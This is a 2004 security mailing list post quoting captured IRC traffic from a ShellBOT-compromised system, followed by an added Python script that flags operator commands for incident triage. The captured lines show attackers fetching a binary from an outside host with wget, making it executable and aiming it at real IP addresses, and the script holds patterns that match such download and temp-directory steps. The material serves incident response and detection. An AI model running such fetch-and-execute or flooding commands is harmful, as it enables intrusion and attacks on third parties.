Security Incidents mailing list archives
Re: Systems compromised with ShellBOT perl script - part 2
From: "nathan c. dickerson" <nathan () pro net>
Date: Thu, 16 Sep 2004 15:47:38 -0700
These are the same guys, using the same exploits that I've dealt with many moons ago.
sly and juntz, same guys, same tricks. Make sure you watch your /dev/shm directories.

-> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix killall -9 doze4
<- PRIVMSG #brdata :doze4: no process killed
-> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix cd /tmp
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix rm doze4
<- PRIVMSG #brdata :rm: cannot lstat `doze4': No such file or directory
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix wget http://members.lycos.co.uk/gookboy/doze4
<- PRIVMSG #brdata :--13:52:35-- http://members.lycos.co.uk/gookboy/doze4
<- PRIVMSG #brdata : => `doze4'
<- PRIVMSG #brdata :Resolving members.lycos.co.uk... done.
<- PRIVMSG #brdata :Connecting to members.lycos.co.uk[212.78.204.20]:80... failed: Connection refused.
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix chmod +x doze4
<- PRIVMSG #brdata :chmod: failed to get attributes of `doze4': No such file or directory
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4 81.29.36.147 53 www.ibm.com
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix killall -9 doze4
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4 65.248.51.13 53 www.ibm.com
<- PRIVMSG #brdata :sh: line 1: ./doze4: No such file or directory
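
Added example, not part of the original post: a triage pass over captured bot-channel traffic in the format shown above, pulling out the shell commands an operator relays through the `!atrix` prefix and labelling the ones a responder cares about first. The rule set, the `triage` function and the sample lines (nick, host, file name, addresses) are constructed assumptions.

```python
import re

# Operator line as captured above: "-> :nick!user@host PRIVMSG #chan :!prefix command".
# The list archive rewrites "@" as " () ", so the user/host part is matched loosely.
OPERATOR = re.compile(
    r"^-> :(?P<nick>[^!\s]+)!(?P<src>.+?) PRIVMSG (?P<chan>#\S+) "
    r":!(?P<prefix>\S+) (?P<cmd>.+)$"
)

# Assumed triage rules (not from the post): first matching rule wins.
RULES = [
    ("download", re.compile(r"^(wget|curl|fetch)\s+(?P<arg>\S+)")),
    ("make-executable", re.compile(r"^chmod\s+\+x\s+(?P<arg>\S+)")),
    ("run-local-binary", re.compile(r"^\./(?P<arg>\S+)")),
    ("workdir", re.compile(r"^cd\s+(?P<arg>/tmp|/var/tmp|/dev/shm)\b")),
]

def triage(lines):
    """Return one finding per operator command that matches a rule."""
    findings = []
    for line in lines:
        m = OPERATOR.match(line.strip())
        if not m:
            continue  # bot replies ("<- ...") and unrelated traffic
        cmd = m["cmd"]
        for kind, rx in RULES:
            hit = rx.match(cmd)
            if hit:
                findings.append({"nick": m["nick"], "channel": m["chan"],
                                 "kind": kind, "arg": hit["arg"], "cmd": cmd})
                break
    return findings

# Constructed sample in the same shape as the capture (not real indicators).
SAMPLE = [
    "-> :op1!~op () host example PRIVMSG #chan :!atrix cd /tmp",
    "-> :op1!~op () host example PRIVMSG #chan :!atrix wget http://files.example.invalid/tool",
    "<- PRIVMSG #chan :Connecting to files.example.invalid... failed: Connection refused.",
    "-> :op1!~op () host example PRIVMSG #chan :!atrix chmod +x tool",
    "-> :op1!~op () host example PRIVMSG #chan :!atrix ./tool 192.0.2.10 53 www.example.com",
    "-> :op1!~op () host example PRIVMSG #chan :!atrix killall -9 tool",
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f'{f["channel"]} {f["nick"]:<6} {f["kind"]:<17} {f["arg"]}')
```

The `download` and `workdir` findings give the URL to block and the directory to inspect on the affected host.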